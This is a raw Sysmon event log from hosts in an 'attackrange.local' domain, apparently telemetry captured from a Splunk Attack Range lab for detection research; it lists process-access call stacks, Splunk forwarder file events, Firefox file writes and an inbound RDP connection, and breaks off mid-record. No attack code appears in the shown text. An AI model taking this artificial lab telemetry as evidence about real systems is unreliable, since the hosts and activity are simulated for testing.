08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.117{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.098{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F72E-60EB-C17D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.095{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.095{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.095{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.095{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F72E-60EB-C17D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.095{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.079{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F72E-60EB-C17D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:54.080{466BC892-F72E-60EB-C17D-00000000CF01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:55.831{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF46C0A6EC4D325783B57D9AC7F0939F,SHA256=5C2F394028778D267FFC9C5603CD6D1F68A76B0808531E707BFB50222061212C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809496Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:54.180{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57401-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809495Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:55.517{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE6689C3BB82E7248A15FC47A0102DBD,SHA256=CA026183C912E55EF06E8DAF3679C950B093A8D6EC312477468911C068169B3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:55.098{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD02417E2EB4B3A94603B064FB4C358D,SHA256=43718E65E5A8F47664FB0DDEB955BFBD08939DF35079D700E2E675623EFD7C95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:56.845{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB90A0AD49AA9DD89EE15718D2454D5F,SHA256=A37C93EA2FD8B3981B0512B2C7396BF149950404F4C77F50B138B5E1464E272F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809498Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:55.539{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-26559-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000809497Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:56.517{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=006519A246BC837E1392E009E07301A4,SHA256=F75AA73DA53B66192CB62A470FFEC002D9A27431A72414BB05962D0B0D30EB8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.875{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDCFCDCDB1C747ECD9F405EE255D7AE7,SHA256=91B37435A26DD06A5FD9910616004B54C7E173442E1205C4F637B96218233682,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809501Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:57.519{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC63E2CAA0453FA5A4BB7A64FAC82F47,SHA256=F2FF8B3B68174CA0AC49BF880B80EA744590B1C83EA4C37EBA610919B3988603,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.594{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51177-false10.0.1.12-8000- 23542300x80000000000000001052925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E72F012E0CA3160D9228272ED5412270,SHA256=2D37EED0D3FB3E5E85727821727FFA0DA783038B5BC29EDD8255FAA001F9F4D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=641CA7BEDD7DBADCBC09906EC4AAF8B8,SHA256=933DCE3AA0D3BF5525726F17A366B1D8E4250699EC67B6D0EA9D43623E09D910,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A36009947184A90E0DF76BF148A3587C,SHA256=F0A507B4D18C7B4FD7645CEB96308A05E3DDE98C503230A868B4E0DACA88449B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EC8E1F52BCFBFC2D00390CCB59DE2B50,SHA256=2F037B65EB8CAFD51EBD81EB77D331D75DA569DBB310A49F403163EAB38F406F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=94A1CAF0A58B28E43700079C652F7586,SHA256=2979F53BB7DD05BE829CCFC4C66285922D5DF1AC0BDB95F2BC78D0F2ABB67C4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1FE05AE45FE37151D3BDE8F098C8399C,SHA256=FD6938823F69BF74FC6770AD223CE1655163E76591C43A201E9CE79FBE15BDD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:57.713{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 